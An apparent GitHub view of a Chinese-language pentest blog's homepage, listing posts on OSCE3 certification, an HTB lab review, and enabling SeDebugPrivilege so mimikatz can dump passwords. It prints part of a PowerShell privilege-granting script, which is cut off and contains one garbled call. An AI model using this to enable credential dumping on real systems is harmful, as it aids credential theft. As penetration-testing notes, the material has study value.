-
Notifications
You must be signed in to change notification settings - Fork 1
/
index.html
1677 lines (1177 loc) · 447 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<script id="hexo-configurations">
var NexT = window.NexT || {};
var CONFIG = {"hostname":"n0maj1o24.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
</script>
<meta property="og:type" content="website">
<meta property="og:title" content="Technical Memorandum">
<meta property="og:url" content="https://n0maj1o24.github.io/index.html">
<meta property="og:site_name" content="Technical Memorandum">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="n0maj1o24">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="https://n0maj1o24.github.io/">
<script id="page-configurations">
// https://hexo.io/docs/variables.html
CONFIG.page = {
sidebar: "",
isHome : true,
isPost : false,
lang : 'zh-CN'
};
</script>
<title>Technical Memorandum</title>
<noscript>
<style>
.use-motion .brand,
.use-motion .menu-item,
.sidebar-inner,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle {
opacity: initial;
top: initial;
}
.use-motion .logo-line-before i { left: initial; }
.use-motion .logo-line-after i { right: initial; }
</style>
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage">
<div class="container use-motion">
<div class="headband"></div>
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="切换导航栏">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<h1 class="site-title">Technical Memorandum</h1>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger">
<i class="fa fa-search fa-fw fa-lg"></i>
</div>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="main-menu menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>
</li>
<li class="menu-item menu-item-categories">
<a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>
</li>
<li class="menu-item menu-item-search">
<a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
</a>
</li>
</ul>
</nav>
<div class="search-pop-overlay">
<div class="popup search-popup">
<div class="search-header">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<div class="search-input-container">
<input autocomplete="off" autocapitalize="off"
placeholder="搜索..." spellcheck="false"
type="search" class="search-input">
</div>
<span class="popup-btn-close">
<i class="fa fa-times-circle"></i>
</span>
</div>
<div id="search-result">
<div id="no-result">
<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
<main class="main">
<div class="main-inner">
<div class="content-wrap">
<div class="content index posts-expand">
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/10/03/OSCE3-Certification-From-Zero-to-One/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/10/03/OSCE3-Certification-From-Zero-to-One/" class="post-title-link" itemprop="url">OSCE3 Certification: From Zero to One</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-10-02 21:10:56 / 修改时间:13:19:29" itemprop="dateCreated datePublished" datetime="2022-10-02T21:10:56Z">2022-10-02</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Penetration-Testing/" itemprop="url" rel="index"><span itemprop="name">Penetration Testing</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/10/03/OSCE3-Certification-From-Zero-to-One/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/10/03/OSCE3-Certification-From-Zero-to-One/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>花了一些时间,拿到了Offensive Security的4个证书。</p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSCE3.png" alt="OSCE3"></p>
<p> <img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSWE.png" alt="OSCE3"></p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSCP.png" alt="OSCE3"></p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSED.png" alt="OSCE3"></p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSEP.png" alt="OSCE3"></p>
<p>下面是我关于4个证书的备考总结,分享给大家:</p>
<p><a href="https://n0maj1o24.notion.site/OSCE3-8cba8825129441aba5d0b7a78961f5bf" target="_blank" rel="noopener">https://n0maj1o24.notion.site/OSCE3-8cba8825129441aba5d0b7a78961f5bf</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/09/03/HTB-Pro-Offshore-Review/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/09/03/HTB-Pro-Offshore-Review/" class="post-title-link" itemprop="url">HTB Pro:Offshore Review</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-09-02 22:14:08" itemprop="dateCreated datePublished" datetime="2022-09-02T22:14:08Z">2022-09-02</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-09-03 07:04:27" itemprop="dateModified" datetime="2022-09-03T07:04:27Z">2022-09-03</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Penetration-Testing/" itemprop="url" rel="index"><span itemprop="name">Penetration Testing</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/09/03/HTB-Pro-Offshore-Review/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/09/03/HTB-Pro-Offshore-Review/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>完成HTB Pro Offshore实验。</p>
<p>证书:</p>
<p><img src="/2022/09/03/HTB-Pro-Offshore-Review/01.png" alt="offshore"></p>
<p>详情查看:</p>
<p><a href="https://n0maj1o24.notion.site/HTB-Pro-Offshore-Review-52158272e2b048e8b8a998a6a7723966" target="_blank" rel="noopener">https://n0maj1o24.notion.site/HTB-Pro-Offshore-Review-52158272e2b048e8b8a998a6a7723966</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/" class="post-title-link" itemprop="url">SeDebugPrivilege未设置导致的小问题</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-08-17 10:25:35 / 修改时间:06:32:20" itemprop="dateCreated datePublished" datetime="2022-08-17T10:25:35Z">2022-08-17</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Penetration-Testing/" itemprop="url" rel="index"><span itemprop="name">Penetration Testing</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>最近,在渗透测试抓取密码的时候,出现如下问题:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/03.png" alt="Sed"></p>
<p>一般出现这个问题是因为当前<code>cmd</code>权限不够,这里的<code>cmd</code>已经是管理员权限,所以有点奇怪,现在来进行排查,查看当前用户的信息:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/00.png" alt="Sed"></p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/01.png" alt="Sed"></p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/02.png" alt="Sed"></p>
<p>虽然当前用户在管理员组,但是<code>SeDebugPrivilege</code>权限竟然没有设置,这个比较奇怪。原因出在这里,没有<strong>Enable SeDebugPrivilege</strong>。</p>
<p>现在来开启<code>SeDebugPrivilege</code>。</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/05.png" alt="Sed"></p>
<p>注意,给当前用户加入<code>SeDebugPrivilege</code>权限之后,需要重启机器,然后再进行操作。上图后续几步操作其实在重启之前是无效的。</p>
<p>重启之后,查看用户权限:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/06.png" alt="Sed"></p>
<p>继续来一遍之前的操作:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/07.png" alt="Sed"></p>
<p>可以发现,现在<code>SeDebugPrivilege</code>已经变为<code>Enabled</code>了。</p>
<p>再次运行mimikatz,发现可以抓取密码了。</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/08.png" alt="Sed"></p>
<p>SetSeDebugPrivilege.ps1源码如下:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Main</span></span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">Param</span> (</span><br><span class="line"> [<span class="type">parameter</span>(<span class="type">Mandatory</span>=<span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">string</span>]<span class="variable">$AccountName</span>,</span><br><span class="line"> [<span class="type">parameter</span>(<span class="type">Mandatory</span>=<span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">string</span>]<span class="variable">$Privilege</span></span><br><span class="line"> )</span><br><span class="line"> <span class="variable">$ErrorActionPreference</span> = <span class="string">"Stop"</span></span><br><span class="line"> <span class="variable">$VerbosePreference</span> = <span class="string">"Continue"</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">#Target account to assign previlage</span></span><br><span class="line"> <span class="variable">$IsAdmin</span> = ([<span class="type">Security.Principal.WindowsPrincipal</span>][<span class="type">Security.Principal.WindowsIdentity</span>]::GetCurrent()).IsInRole([<span class="type">Security.Principal.WindowsBuiltInRole</span>]<span class="string">'Administrator'</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Needs Admin privs</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$IsAdmin</span>) {</span><br><span class="line"> echo <span class="string">"`n[!] Administrator privileges are required!`n"</span></span><br><span class="line"> <span class="keyword">Return</span></span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$Whoami</span> = whoami /priv /fo csv |<span class="built_in">ConvertFrom-Csv</span></span><br><span class="line"> <span class="variable">$SeDebugPriv</span> = <span class="variable">$whoami</span> <span class="operator">-Match</span> <span class="string">"SeDebugPrivilege"</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># SeDebugPriv needs to be available</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$SeDebugPriv</span>) {</span><br><span class="line"> echo <span class="string">"`n[!] SeDebugPrivilege not available, available it!"</span></span><br><span class="line"> <span class="built_in">Write-Verbose</span> (<span class="string">"Set account privilage({0}) to '{1}'"</span> <span class="operator">-f</span> <span class="string">"SeDebugPrivilege"</span>, <span class="variable">$AccountName</span>)</span><br><span class="line"> [<span class="type">LsaWrapper</span>]::SetRight(<span class="variable">$AccountName</span>, s)</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> echo <span class="string">"`n[?] SeDebugPrivilege is available now!"</span></span><br><span class="line"> <span class="keyword">foreach</span> (<span class="variable">$priv</span> <span class="keyword">in</span> <span class="variable">$whoami</span>) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$priv</span>.<span class="string">"Privilege Name"</span> <span class="operator">-contains</span> <span class="string">"SeDebugPrivilege"</span>) {</span><br><span class="line"> <span class="variable">$DebugVal</span> = <span class="variable">$priv</span>.State</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get current proc handle</span></span><br><span class="line"> <span class="variable">$ProcHandle</span> = (<span class="built_in">Get-Process</span> <span class="literal">-Id</span> ([<span class="type">System.Diagnostics.Process</span>]::GetCurrentProcess().Id)).Handle</span><br><span class="line"> echo <span class="string">"`n[+] Current process handle: <span class="variable">$ProcHandle</span>"</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Open token handle with TOKEN_ADJUST_PRIVILEGES bor TOKEN_QUERY</span></span><br><span class="line"> echo <span class="string">"`n[>] Calling Advapi32::OpenProcessToken"</span></span><br><span class="line"> <span class="variable">$hTokenHandle</span> = [<span class="built_in">Int</span><span class="type">Ptr</span>]::Zero</span><br><span class="line"> <span class="variable">$CallResult</span> = [<span class="type">Advapi32</span>]::OpenProcessToken(<span class="variable">$ProcHandle</span>, <span class="number">0</span>x28, [<span class="type">ref</span>]<span class="variable">$hTokenHandle</span>)</span><br><span class="line"> echo <span class="string">"[+] Token handle with TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY: <span class="variable">$hTokenHandle</span>`n"</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Enable 